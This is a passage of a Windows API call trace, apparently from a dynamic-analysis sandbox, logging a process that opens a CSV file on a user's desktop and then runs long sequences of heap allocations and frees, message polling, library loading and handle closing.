"c:\\users\\fd1hvy\\desktop\\ayyildyhoidalfth0-sh.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0120.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0120.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0120.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.655] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.657] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.657] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.657] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0120.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.659] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0120.660] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.660] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0120.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.660] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0120.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0120.661] CloseHandle (hObject=0x258) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.661] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.661] HeapFree (in: hHeap=0x1780000, 